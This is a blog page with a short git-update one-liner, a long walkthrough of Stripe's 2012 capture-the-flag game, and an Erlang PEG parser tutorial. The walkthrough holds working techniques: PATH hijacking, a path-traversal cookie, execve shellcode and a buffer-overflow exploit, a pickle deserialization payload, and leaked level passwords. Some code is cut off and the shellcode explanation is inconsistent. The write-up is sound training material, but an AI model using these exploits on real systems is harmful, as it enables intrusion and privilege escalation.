Quick tip for updating git repos

If you're like me and you keep all your git repositories in a single directory, I assert you're also like me and don't update them from time to time. Now, I'm not particularly an advocate for just willy-nilly updating all of your git repos just because you want to, but sometimes it just makes sense (like if you're about to head up on an airplane and need to update a few repos before you take off). Well, I had a little bash fun and came up with this little line.

find . -type d -maxdepth 1 \
    -exec bash -c "cd '{}' && if [ -d \$PWD'/.git' ]; then \
    echo 'updating ' \$PWD; git pull origin master 2>/dev/null; fi" \;

Basically this looks through the current directory for all the files and directories. If there is a .git directory then it will pull the latest and greatest version (presumably from github). That's it. Hope this helps someone else.

Hacking for fun -- capture the flag

Stripe released their capture the flag game recently https://stripe.com/blog/capture-the-flag and I thought it'd be a fun exercise to document my entire procedure.

So... before you enter, I warn you... there are spoilers in here...


Welcome to Capture the Flag. I, by the way, am not at all affiliated with

Stripe, I'm just an excited participant and want to share my journey.

Let's get started on level01

ssh level01@ctf.stri.pe

So we want to read the file /home/level02/.password. It looks like it's owned by level02, so we can't just read it (and what fun would that be?).

Let's investigate the binaries that Stripe suggests we look at.

$ /levels/level01
Current time: Fri Feb 24 10:40:58 UTC 2012
$ ls -la /levels/level01 
-r-Sr-x--- 1 level02 level01 8617 2012-02-23 22:44 /levels/level01

Interesting... what can we do with the current date? I suspect that it doesn't implement date on its own, that'd be insane. I bet we can exploit that.

Looking at the source... AHA!


It shells out to the system, date. If we could only change the method that runs when date gets called, perhaps we can use that to our advantage.

In linux, binaries are found using the $PATH variable. Considering it shells out to the date function, if we could trick the shelling out to do something different, BAM, we'd have it. Let's create a "binary" that will show us the password... something like:

$ echo "cat /home/level02/.password" > date
$ chmod +x date

Let's link our path and we're almost there!

$ export PATH=$(pwd):$PATH
$ echo $PATH

Now we can trick the shelling out to the system to call our date and we're golden.

$ /levels/level01
Current time: kxlVXUvzv


Rad! We've made it to level 02! Perhaps we can have some success in this game after all. Let's move on to level02.

The hint suggests that we should visit: http://ctf.stri.pe/level02.php. Note: For some reason it confused me that I needed HTTP Basic Authentication (until I read the hint) that we have to provide as the level02/[password from above].

So once we enter that, we see a form. I wonder if there is any way we can bypass the form. Considering Stripe wants us to 'crack' our way through this, I'm willing to bet some 'idiot' (aka purposeful mistake) left something in the source for level02.php. Let's have a look!

$out = '';
if (!isset($_COOKIE['user_details'])) {
  $out = "

  //Looks like a first time user. Hello, there!";

  $filename = random_string(16) . ".txt";
  $f = fopen('/tmp/level02/' . $filename, 'w');

  $str = $_SERVER['REMOTE_ADDR']." using ".$_SERVER['HTTP_USER_AGENT'];
  fwrite($f, $str);
  setcookie('user_details', $filename);
else {
  $out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);

echo $out ?

Oh wow, that's easy as pie. Do you see why?

It runs the application at level03 creds, so if we can get it to read the file /home/level03/.password, we'll be golden. Luckily we can do this on the browser without much sweat.

We want to get to the else statement so that it can 'read' from the file that's on the system. If there is a

user_details cookie set, we can dropdown into that else statement. We can easily set a cookie from the browser, but we'll use curl since it's easier to show in text.

Making sure to keep the HTTP Basic Authentication in the request:

curl --user level02:kxlVXUvzv --digest http://ctf.stri.pe/level02.php

Let's try to set the user_details cookie and see if we can get the contents of the cookie to render on the html. We see that it's going to read from a file on the filesystem. We can so definitely use this to our advantage and have it read from the file we want to pull from. Let's set the cookie to the relative (to the file) path of the file that we're interested in: /home/level03/.password.

  curl --user level02:kxlVXUvzv --digest --cookie "user_details=../../home/level03/.password" http://ctf.stri.pe/level02.php
  # ...

  # Welcome to the challenge!


Well that was easy!


Congratulations on making it to level 3!

The password for the next level is in /home/level04/.password. As before, you may find /levels/level03 and /levels/level03.c useful. While the supplied binary mostly just does mundane tasks, we trust you'll find a way of making it do something much more interesting.

There are 6 levels in this CTF; if you're stuck, feel free to email ctf@stripe.com for guidance.

Firstly, let's look at the source of /levels/level03.c.

Interesting. At first glance, the source doesn't reveal anything fancy for me yet. The common hacks are out... buffer overflow is taken into account, the format string bug isn't going to be useful here. Looks like we might have to dig a little deeper for this round.

The source reveals some lazy programmer left a crucial function in the source code

int run(const char *str)
  // This function is now deprecated.
  return system(str);

This is going to be our target. Since the file is owned by the user level04, anything that gets run by that function will be owned by the level04 user.

It also shows that it calls a function by pointer after it does the maintenance of copying the buffer and checking for overflows.

fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};

That's mighty interesting... Finally the last thing we'll take note about is that the function gets called by a pointer, which is good. It means if we can get access to run in comparison to the fns function pointer, then we can execute it.

int truncate_and_call(fn_ptr *fns, int index, char *user_string)
  char buf[64];
  // Truncate supplied string
  strncpy(buf, user_string, sizeof(buf) - 1);
  buf[sizeof(buf) - 1] = '\0';
  return fns[index](buf); // 

Let's get to work.

ssh level03@ctf.stri.pe
# Fire up gdb on the sucker
gdb /levels/level03 --directory=/levels

(gdb) r 0 "hello world"
Starting program: /levels/level03 0 "hello world"
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).

Uppercased string: HELLO WORLD

Program exited normally.

Rad! We're in good shape. Let's take a step back and think about what the stack looks like where we are at:

----------------- <- Top of the stack
|       .       |
|       .       |
|       .       |
|     argv      |
|     argc      |
|     etc       |
|     stack     |
|       |       |
|       |       |
|       v       |
|       ^       |
|       |       |
|       |       |
|     heap      |
|     bss       |
|     etc       |

When the program loads, it starts at the top of the stack and loads all of the argv/argc/env into the stack so that the program has these accessible when it runs. When a new function is called, its local arguments are placed upon the stack just the same as the main function works (with some slight differences, of course). It'll look something like:

|     ...       |
|     argc      |
|     etc       |
|     stack     |
|       |       |
|      ret      |  <- return address after we're done with the function
-----------------  <- frame pointer (basically the top of the stack for the local function)
|      str      |  <- parameter for `int run(const char *str)`
|     vars      |  <- local variables, if any
|       .       |  <- function call

So when we sink into the truncate_and_call function, all it does is set up a stack below our current running stack. We're going to do some math and try to calculate where the run function is in correlation to our current running spot.

Nothing remarkable yet. Let's investigate a bit further into when the function gets called.

(gdb) b truncate_and_call
Breakpoint 1 at 0x8048780: file level03.c, line 57.
(gdb) r 2 "hello world"
(gdb) r 2 "hello world"
Starting program: /levels/level03 2 "hello world"
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).

Breakpoint 1, truncate_and_call (fns=0xffcd393c, index=2, user_string=0xffcd5915 "hello world") at level03.c:57
57    {

This is good news, we're almost to the point where we know where the buffer is. If we can load the buffer with the execution method, then we're good to go. Let's go a bit further and then do some digging and whip out our calculators.

(gdb) n
60    strncpy(buf, user_string, sizeof(buf) - 1);
(gdb) p &buf
$1 = (char (*)[64]) 0xffcd38cc

Now we have the address of the buffer, let's get the address of the fns

(gdb) p fns
$2 = (fn_ptr *) 0xffcd393c

Add a little bit of math:

(gdb) p (0xffcd393c-0xffcd38cc)/sizeof(int)
$5 = 28

Lastly, let's capture the address of 'run' so that when the program executes it, we can 'fake' where it calls and then leave it (q):

(gdb) p run
$1 = {int (const char *)} 0x804875b 
(gdb) q

Great, so we are specifically 28 addresses away from the run function when the program calls fnsindex;. Now we can go back to our command-line and execute the function that's 28 addresses up the stack. So we're going to "trick" the program to call our own method at the address.

# Because of little endians, notice that the hex address is "backwards"
$ echo "cat /home/level04/.password" > $(printf "\x5b\x87\x04\x08")
$ chmod +x "$(printf '\x5b\x87\x04\x08')"

Finally run it and we'll get the password!

$ /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')"


Woot! Congrats, we got to level04 in one piece! As per usual, we have to get into the file /home/level05/.password.

Let's take a peek at the source code before we dive too much further into the process. (Because it's so small, I'll just copy the file here).

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void fun(char *str)
  char buf[1024];
  strcpy(buf, str);

int main(int argc, char **argv)
  if (argc != 2) {
    printf("Usage: ./level04 STRING");
  printf("Oh no! That didn't work!\n");
  return 0;

Oh this looks ripe for the pickings. I'd be willing to bet we can do this without batting too much of an eye. It looks like standard buffer overflow exploit fun.

I'll explain. We can exploit this program because the first argument is a string that’s being shoved into a buffer where the length is not checked. That means we can attempt to rewrite the end of the buffer where the return pointer is kept. This is the basis for the name of the exploit “buffer overflow.” Get it?

top of the stack
[program stuff][--------buffer-------][return_address]

We want to fill that buffer and then overwrite the return_address such that the return address after the function is called gets executed.

To be complete, let's talk about writing shellcode. Yet another shellcode tutorial... shhhh, it'll be fun.

When I write shellcode, I can just do it directly in assembly, but it takes a while for me to get back into assembly-mode-of-thinking, so I usually like to write what I want in C, disassemble the code and the strip out the parts I don't need. Plus I usually don't make dumb errors when I do it like that.

Let's whip up our trusty vim and get to coding a c program to drop us into a shell.

#include <stdlib.h>

int main()
  char *args[2];
  args[0] = "/bin/sh";
  args[1] = NULL;
  execve(args[0], args, NULL);

This is the absolute smallest, simplest way to drop into a shell (that I can think of right now) in c. So let's compile it and make sure it works (of course).

$ # I use -static almost always so that there are no dynamic linking issues
$ gcc -static -g -o shell shell.c
$ ./shell

Awesome! It works. Now the fun begins in trying to turn this into shellcode. First, we'll turn it into assembly code, because... well, it'll be much easier to shrink and package shellcode from assembly.

$ gdb shell
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:

Reading symbols from /tmp/tmp.RL54A9ZGit/shell...(no debugging symbols found)...done.

(gdb) disas main
Dump of assembler code for function main:
   0x0000000000400434 : push   %rbp
   0x0000000000400435 : mov    %rsp,%rbp
   0x0000000000400438 : sub    $0x10,%rsp
   0x000000000040043c : movq   $0x4798c4,-0x10(%rbp)
   0x0000000000400444 :    movq   $0x0,-0x8(%rbp)
   0x000000000040044c :    mov    -0x10(%rbp),%rax
   0x0000000000400450 :    lea    -0x10(%rbp),%rcx
   0x0000000000400454 :    mov    $0x0,%edx
   0x0000000000400459 :    mov    %rcx,%rsi
   0x000000000040045c :    mov    %rax,%rdi
   0x000000000040045f :    callq  0x40d4a0 
0x0000000000400464 :    mov    $0x0,%edi
   0x0000000000400469 :    callq  0x401050 
End of assembler dump.

Okay, a bit of explaining here before we go a bit further. (If you don't want to run through this "tutorial," feel free to skip to the next section). Remember the last mission when we had to look up the stack and compute where our function was, taking into account the arguments on the stack for the function call. We're going to do some work here that's related. So if you skipped over that, I suggest checking that out again.

The main method calls execve, which you can see from the line:

0x000000000040045f :  callq  0x40d4a0

This means that all of the local variables that will be used by execve will be available on the stack. Let's follow the stack placement for this method call:

        |       .       | <-- 4 byte stack boundary
%rsp -> |    old %rbp   | <-- mov    %rsp,%rbp (4 push old value of %rbp on the stack)

The first step is to update the %rsp and then move the %rbp to point to the new top of the stack. This is so that we can "fake" the method call into thinking that it's the top of the stack (note, this is how function calls work). Next, we'll subtract 16 bytes from the %rsp that'll give us 8 bytes of padding on our stack. It now looks like:

        |       .       | 
        |    old %rbp   | 
        |       .       |
        |       .       |
%rsp -> ----------------- <-- sub    $0x10,%rsp

Now we're going to load a specific address inside the memory location we just allocated on the stack.

      |       .       | 
      |    old %rbp   | 
      |       .       |
      |    0x4798c4   | <-- movq   $0x4798c4,-0x10(%rbp) [P("/bin/sh") -- a pointer to "/bin/sh"]
%rsp -> -----------------

That's the address of the "/bin/sh" that we allocated before. To prove it, we can dive into the address in gdb. Let's take a look!

(gdb) x/1s 0x4798c4
0x4798c4:    "/bin/sh"

Cool! The next instruction is going to load 0 into the next memory location just above where "/bin/sh" is located.

        |       .       | 
        |    old %rbp   | 
        |      0x0      | 
        |    0x4798c4   | <-- P("/bin/sh")
%rsp -> -----------------

The next two instructions load the P("/bin/sh") into &rax and then load the effective address into %rcx, so our updated stack looks like this:

        |       .       | 
        |    old %rbp   | 
        |      0x0      | 
        |    0x4798c4   | <-- P("/bin/sh") -- (mov    -0x10(%rbp),%rax) -- (lea    -0x10(%rbp),%rcx) <~ %rcx
%rsp -> -----------------

Now we're going to push a NULL onto the stack:

        |       .       |
        |    old %rbp   | 
        |      0x0      | 
        |    0x4798c4   |
%rsp -> |      0x0      | <-- mov    $0x0,%edx

Almost there, promise... so now we're going to push the two

        |       .       |
        |    old %rbp   |
        |      0x0      |
        |    0x4798c4   |
        |      0x0      |
        |     %rcx      |
%rsp -> |     %rax      |

So let's walk through this because the absolute next call is going to be to execve. On our stack now, we have a pointer to %rcx, which is simply a pointer to the pointer of the P("/bin/sh"). %rax is simply a pointer to "/bin/sh" (we loaded this effective address).

Since execve looks like:

int execve(const char *path, char *const argv[], char *const envp[]);

We can see that the stack will have everything we know loaded on to the stack. The top of the stack (yes, I know it's weird to say “top of the stack” even though in this picture it's at the bottom, but that’s just the convention)... which is denoted by %rsp (which you can remember the "sp" to mean "stack pointer") we have the const char *path at the top. The second argument is a pointer to the array of argument strings. This points to %rcx and then 0. This is null. Ahhh! This is exactly what our c program did, remember? Finally, the 0x0 NULL is the NULL where envp points! Gah, it's so easy!

Back to the level

Now that we know what the stack looks like, let's write this in assembly. Fire up vi again and let's code this up. Maybe with a bit more verbosity so that we can read it ourselves.

.globl _start

  xorl %eax, %eax     /* We need to push a null terminated string to the stack */
  pushl %eax          /* So first, push a null */
  pushl $0x68732f2f   /* Push //sh */
  pushl $0x6e69622f   /* push /bin */
  movl  %esp, %ebx    /* Store the %esp of /bin/sh into %ebx */
  pushl %eax          /* Since eax is still null, let's use it again */
  pushl %ebx          /* Now we can writ the /bin/sh again for **argv */
  movl  %esp, %ecx    /* Write argv into %ecx */
  xorl  %edx, %edx    /* NULL out edx */
  movb  $0xb, %al     /* Write syscall 11 into %al */
  int $0x80           /* Interrupt the system */

Gross, right? Just kidding, hopefully the comments help. Anyway, let's compile this and then load it and see if it works for us!

$ as -o exec.o exec.s 
$ ld -o Exec exec.o 
$ ./Exec 

Awesome! If you didn't make any typos, we should be dropped into a new shell. This is rad. Now we'll extract this assembly language into shellcode. Relax, this part is the easy part.

$ objdump -d Exec 

Exec:     file format elf64-x86-64

Disassembly of section .text:

  4000b0:   c7 04 25 e4 00 60 00    movl   $0x6000d8,0x6000e4
  4000b7:   d8 00 60 00 
  4000bb:   b8 0b 00 00 00          mov    $0xb,%eax
  4000c0:   bb d8 00 60 00          mov    $0x6000d8,%ebx
  4000c5:   ba e0 00 60 00          mov    $0x6000e0,%edx
  4000ca:   cd 80                   int    $0x80
  4000cc:   bb 0a 00 00 00          mov    $0xa,%ebx
  4000d1:   b8 01 00 00 00          mov    $0x1,%eax
  4000d6:   cd 80                   int    $0x80

So this is all great and good, of course... but we will end up with nulls in our code if we follow along strictly like this. So with a bit of magic and experience with assembly, I'm going ot shorten the code, but explain it along the way too. Promise.

.globl _start

  xorl %eax, %eax     /* We need to push a null terminated string to the stack */
  pushl %eax          /* So first, push a null */
  pushl $0x68732f2f   /* Push //sh */
  pushl $0x6e69622f   /* push /bin */
  movl  %esp, %ebx    /* Store the %esp of /bin/sh into %ebx */
  pushl %eax          /* Since eax is still null, let's use it again */
  pushl %ebx          /* Now we can writ the /bin/sh again for **argv */
  movl  %esp, %ecx    /* Write argv into %ecx */
  xorl  %edx, %edx    /* NULL out edx */
  movb  $0xb, %al     /* Write syscall 11 into %al */
  int $0x80           /* Interrupt the system */

That looks a lot cleaner, ey? The two big hex statements basically mean “/bin/sh” in hex, and everything else is pretty self explanatory. We push the arguments on the stack, use the stack pointer to push the NULLed out variables on to the frame and then call the syscall 59 (which is the execve syscall).

Notice that we added the calls shl and shr into our assembly language program. This will shove the bits left and then back right, effectively so we can realign the address from the %rdi register and later the %rax register. For example, bits in memory look like:


By shifting left we force the bits to be overwritten without a null. This looks like:


So this clears our bits with non-null characters.

Cake! Now let's turn that into shellcode.

$ objdump -d ./code

./code:     file format elf32-i386

Disassembly of section .text:

 8048054:   31 c0                   xor    %eax,%eax
 8048056:   50                      push   %eax
 8048057:   68 2f 2f 73 68          push   $0x68732f2f
 804805c:   68 2f 62 69 6e          push   $0x6e69622f
 8048061:   89 e3                   mov    %esp,%ebx
 8048063:   50                      push   %eax
 8048064:   53                      push   %ebx
 8048065:   89 e1                   mov    %esp,%ecx
 8048067:   31 d2                   xor    %edx,%edx
 8048069:   b0 0b                   mov    $0xb,%al
 804806b:   cd 80                   int    $0x80

Thanks to our trickery, we have no NULLS in our shellcode. Now we can take those hex values and set it up as a shellcode. You can do this by hand or use a nifty little tool such as:

#include <stdio.h>

extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }

char code[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

Now let's test it with our own c program before we go on the attack:

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

int main(int argc, char **argv) {
    void *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
    memcpy(ptr, shellcode, sizeof(shellcode));
    sc = ptr;
    return 0;

Note, we're operating on a non-executable stack, so we have to use the memory mapping to create a memory mapping executable man mmap and copy it into place. Let's see if it works...

$ gcc -g test.c -o test
$ ./test 

Perfect! Our shellcode is 49 bytes long (a bit big, but we have 1024 bytes of buffer available in the program, so in the scheme of things, it's tiny).

One more bit of stack review before we actually get to the hack (this will help us shortly, I promise). The stack when a function is called looks something like this:

| return address | rbp+4
|   saved rsp    | rbp           rsp
|       .        | rbp-4
|       .        | rbp-8
|       .        | rbp-12
|       .        | rbp-16

Let's see why this is useful. Let's try to blow the stack on the program first.

$ gdb /levels/level04
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:

Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "ABCD" x 1100'`
Starting program: /levels/level04 `perl -e 'print "ABCD" x 1100'`
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).

Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()

Looking at the registers, we see that the base pointer and the instruction pointer have been overwritten and now point to "DCBA."

(gdb) i r
eax            0xffe21200   -1961472
ecx            0x0  0
edx            0x1131   4401
ebx            0xf77abff4   -142950412
esp            0xffe21610   0xffe21610
ebp            0x44434241   0x44434241
esi            0x0  0
edi            0x0  0
eip            0x44434241   0x44434241

That's the basis of the buffer overflow exploit. We're going to try to load the ebp with the return address we want... or approximately close to one that we know to be good.

Let's go back to /levels/level04.

So what we'll do is flow in the shellcode and then a bunch of NO-OPs (basically bytes that don't matter) and then try to overrun the return address with the system call.

Awesome. We want to get the shellcode into the buffer and set the return address 8 bytes later so that when the return address is popped off, it looks like it's ours :)

We could write the final part of this exploit in another language, like python or ruby, but to stay consistent we'll construct this part in c.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define LENGTH                  1024+15
#define PROG_NAME               "/levels/level04"
#define RET                     0x0804857b
#define NOP                     0x90

// eip sits at 1036 away on the buffer
// our sc is 23 bytes long
// Thus we need 1013 (1036 - 23) bytes of NOP
// before we put the address
const char *sc =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

int main (int argc, char const *argv[])
  /* declare and initialize some of the variables */
  char buff[LENGTH];
  long retaddr = RET;
  int i, 
      len = LENGTH, 
      sc_len = strlen(sc);

  // [shellcode][NOPNOPNOPNOPNOPNOP][return]

  for (i = sc_len; i 

So how did I get the EAX location? Well... because we are using the strcpy function, the contents of %eax will contain the location of the buffer that gets overflowed! Duh, so all we have to do is find the location of that call and bam-o! Let's look for that:

  $ objdump -d /levels/level04 | grep eax | grep call
   8048438:   ff 14 85 14 9f 04 08    call   *0x8049f14(,%eax,4)
   804847f:   ff d0                   call   *%eax
   804857b:   ff d0                   call   *%eax

Sweet! So run that bad boy and we'll get ourselves a password!

  $ ./b
  $ cat /home/levels05/.password


Oh this one seems quite a bit different. The opening line:

Congratulations on making it to level 5! You're almost done!

The password for the next (and final) level is in /home/level06/.password.

As it turns out, level06 is running a public uppercasing service. You can POST data to it, and it'll uppercase the data for you:

  curl localhost:9020 -d 'hello friend'
        "processing_time": 5.0067901611328125e-06,
        "queue_time": 0.41274619102478027,
        "result": "HELLO FRIEND"

You can view the source for this service in /levels/level05. As you can see, the service is structured as a queue server and a queue worker.

Could it be that this seemingly innocuous service will be level06's downfall?

Let's look in the source code to see if we can find any hints.

If you know python, you should know the pickle module is cause for concern and the application is clearly using it http://blog.nelhage.com/2011/03/exploiting-pickle/ and http://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/. This is where we'll start looking because it's calling pickle.

  def deserialize(serialized):
        logger.debug('Deserializing: %r' % serialized)
        parser = re.compile('^type: (.*?); data: (.*?); job: (.*?), re.DOTALL)
        match = parser.match(serialized)
        direction = match.group(1)
        data = match.group(2)
        job = pickle.loads(match.group(3))
        return direction, data, job

Hm... so the line calling pickle is being called job = pickle.loads(match.group(3)). Alrighty... that'll be useful in a minute... First, look at the string that it's looking at... it's being called with the third match group which is matched with job:. Clearly the goal is to get to the third match. That should be relatively easy because all we have to do is match up to the job string. Rad. Let's experiment around:

  $ curl localhost:9020 -d 'testdata'
      "processing_time": 5.0067901611328125e-06, 
      "queue_time": 0.41687297821044922, 
      "result": "TESTDATA"

Okay, let's see if we can't trick it into including our data in job. The data, by the way that we'll want to inject is something along the lines of:

  "cos\nsystem\n(S'cat /home/level06/.password > $(pwd)'\ntR.")"

We know this because this is what the pickle exploit looks like (see http://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/ for more information).

Let's see if we can't try to get our stuff in the job field. Then we can clearly run that exploit. Let's try and look at some logs at the same time...

  $ curl localhost:9020 -d 'datamatcheshere; job: hi'
      "result": "Job timed out"

Let's see, just for kicks, if we can get it to run something. Putting in the exploit just to see if we can't get it to run...

  $ curl localhost:9020 -d "datamatcheshere; job: $(printf "cos\nsystem\n(S'cat /home/level06/.password > /tmp/pword05'\ntR.")"
      "result": "Job timed out"

Bummer, that doesn't look like it did anything... for giggles, let's see if it did.

  $ cat /tmp/pword05

Hah! That's cool. Let's move onwards!


Sweet! Logging in, we see the usual message:

  Congratulations on making it to level 6! This is the final level. The
  flag is almost in your grasp.

  The password for the flag is in /home/the-flag/.password.

  As it turns out, the-flag is a pretty arrogant user. He created a
  taunting utility and left it in /levels/level06 (source code in
  /levels/level06.c). This utility will read the first line of a
  specified file, compare it with your supplied guess, and taunt you
  unless you guessed correctly.

  You could try using the taunt utility to brute-force the password, but
  that would take... well, I don't want to say forever, but
  approximately that. I guess you'll have to find another way.

  Best of luck!

Oh fun! Let's dig in. Creating a dummy file to check the output of /levels/level06

  $ /levels/level06 /home/the-flag/.password 1
  Welcome to the password checker!
  level06@ctf5:/tmp/tmp.RWhNkGzD30$ Ha ha, your password is incorrect!

Hm... that's not incredibly helpful... yet. Let's look at the source. I see fork in there... perhaps we can play with fork... Let's keep looking... Hm. Not much else to go on... I suppose we could try to 'brute-force' the password, despite the fact that the hint says not to. Since we are looking at it character 1-by-1, perhaps we can work on getting each character... Let's try it.

I wrote this program and hopefully included a bunch of comments to help, but basically we're iterating over every single character and using a unix pipe to pass it off to the program. Then we'll wait for the response to come back and hopefully it'll be a good one. Speaking of which, I had to check what a good response would be... let's see:

  $ /levels/level06 /home/the-flag/.password 1
  Welcome to the password checker!
  level06@ctf5:/tmp/tmp.tVkFJvBIju$ Ha ha, your password is incorrect!
  echo $?

Okay, so maybe we can't rely on the status of the response... how about rlimit. rlimit is the resource limit that linux allows. We'll set a hard limit the stdout file so that if a character is revealed, then we can catch that. Oh, that's pretty nifty, ey? Anyway, here's my source code, mainly because I'm tired. If anyone wants me to, I'll comment more about it.

  vi level06.c; gcc -o level06 level06.c; ./level06

    Oh yeah, pipes: http://tldp.org/LDP/lpg/node11.html

  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  #include <errno.h>
  #include <fcntl.h>
  #include <limits.h>
  #include <string.h>
  #include <sys/wait.h>
  #include <sys/time.h>
  #include <sys/resource.h>
  #include <sys/types.h>
  #include <sys/stat.h>

  #define PROG_NAME "/levels/level06"
  #define THE_FLAG "/home/the-flag/.password"
  #define BUFSIZE 512

  // Globals, woo
  int base_filesize;
  char buf[BUFSIZE];

  int main(int argc, char *argv[]) {
   char buffer[BUFSIZE];
   int i, j;
   char c;
   memset(buffer, 0, BUFSIZE);
   for (i = 0; i 

  Anyway, happy hacking friends. Remember, do only good :)!

  Password: theflagl0eFTtT5oi0nOTxO5

Other solutions online:




Special thanks to zx2c4 for ideas and thoughts.

Neotoma - Super powerful parsing for erlang

Erlang strings are painful

Oh it's so true. The pain is super apparent, especially when trying to parse configuration files. The traditional way to parse a configuration file that is not in the erlang format can be pretty hard to do. For instance, for beehive, the application configuration template looks like:


# Config file
# For example, a rack app
bundle: echo "Bundle java stuff"
start: /bin/rackstart.sh
# etc. etc.

Originally, this was parsed in lex/yacc and consumed in c++ (shudder). The code for that is available buried deep within the history of babysitter

A traditional parser would look something like this:

-module (config_parser).
-export ([file/1]).

-define (SEPARATOR, $:).

file(Filename) ->
  {ok, Fd} = file:open(Filename, [read]),
  io:setopts(Fd, [binary]),
  for_each_line(Fd, fun parse/3, 1, []).

for_each_line(Device, Proc, Count, Accum) ->
  case io:get_line(Device, "") of
    eof  -> file:close(Device), Accum;
    Line -> 
      NewAccum = Proc(Line, Count, Accum), 
      for_each_line(Device, Proc, Count + 1, NewAccum)

parse(Line, Count, Acc) ->
  [peg_parse(Line, Count)|Acc].

peg_parse(Line, Count) ->
  {Field, X} = parse_line(Line, [], []),
  case Field of
    comment -> ok;
    X -> io:format("[~p] ~p:~p~n", [Count, Field, X])

% Top
% Strip comments
parse_line(>, [], _Acc) -> {comment, []};
% Is this the field?
parse_line(>, _Field, Acc) -> parse_line(Rest, lists:reverse(Acc), []);
parse_line(>, Field, Acc) -> parse_line(Rest, Field, [Char|Acc]);
parse_line(>, Field, Acc) -> {Field, lists:reverse(Acc)};
parse_line(>, Field, Acc) -> {Field, lists:reverse(Acc)}.

I'll only touch on the basics of what that is here (so if you want to skip it, just go to the next section).

Basically we open a file descriptor to the file and tell it to read in the binary format (a little faster and less work on the vm). For every line, we go through character by character and examine based on the position and context that the character is in and store the value in the context where it appears. Later we'll come back (notice where the io:format is?) and store it in some meaningful way. This is just a demo. If there is enough interest, I can finish it and post it here. Otherwise, I won't spend more time on it as there is a better way.

Introducing Neotoma

Neotoma, a project by Sean Cribbs that makes PEG parsing in erlang easy. It's a nifty tool that generates an unambiguous parser that generates a parse tree. Don't try to use this to create a parser to examine natural languages though, it's not an CFG (context free grammar) parser.

There aren't too many resources available yet through google.com, so after some head scratching and pm'ing with Sean Cribbs, the author, I was able to sketch the parser to dig out the parse tree for the grammar in a ridiculously little amount of code.

Before we get into the PEG grammar, there are a few basic pieces of terminology that you need to know.

Terminal symbols

There are two disjoint sets of items called terminal symbols . These are basic pieces (or atoms) of a grammar. There are two types of terminals, the non-terminal and the terminal symbol. They must be, by necessity disjoint sets of symbols for a valid grammar. The reason will become apparent shortly.

*non-terminal symbol - Symbol representing a 'variable' in a grammar. These are symbols that can be replaced by other elements of the grammar.

*terminal symbol - Symbols that cannot be broken down any further, but that can be consumed by non-terminals.Let's look at an example. These are two non-terminals that describe a signed integer in the BNF form of a grammar:

::= ['-'] 

::= '0' | '1' | '2' | '3' | '4' | '5' | '6' | '7' | '8' | '9'

The integer and the digit are the non-terminals, while the 0-9 and - are the terminal symbols.

PEG grammars

A "parsing expression grammar", or PEG is an formal description of an analytic language model that describes a set of rules for recognizing strings and their context in the language. For instance, in the English language a proper declarative sentence requires a subject and a predicate

My name is Mary.

= My name

= is Mary

Although you should never use a PEG to parse natural language (use a Backus-Naur Form), the corresponding PEG would look something like (incomplete, but only used for example):

% Psst, a Neotoma PEG for the sentence "My name is Mary"

This is a VERY basic PEG parser. What does all this mean? Well...

## Introducing Neotoma

Let's look at the simplest possible grammar for describing the exact same thing, a signed integer.


    That's it? Yep. This might look a little confusing, but don't worry, I'll explain what's happening here. First, look at the \
    Decimal\ rule. That says that any digit 0 through 9 will be consumed by this rule. The stuff in the \
    \ will be what happens to the matched number. We'll get back to that soon. The \
    rule\ non-terminal will 'take' the Decimal rule in. This won't do anything interesting yet, other than say that the rule will contain an integer. Let's change that:


        This shouldn't be too hard to understand from the rule above, but there are two new things in these rules. First, the stuff that happens in between the \
        \ is the semantic part of the parse tree. Sean calls this the 'transformation' of the grammar. What it does is stuff all the matches of the rules into a variable called \
        Node\. From there, you can do basically what you want with what the transformation returns (so long as the rules that use it understand it). If instead of putting stuff in \
        \ at the end of a rule definition, you put a \
        ~\, this says return the Node variable untouched.

        The second new introduction in this set of rules is the \
        /\. This an \
        or\ statement. It's a precedence-based 'or'. So, for our rules above, the primary terminal can either be an additive surrounded by parenthesis OR a decimal. Note, I said that precedence is denoted here. The first item in the list is the first item matched. It's always a good idea (even the author Sean Cribbs suggests) to try to match the longest rule possible. 
        **Precedence is important.**

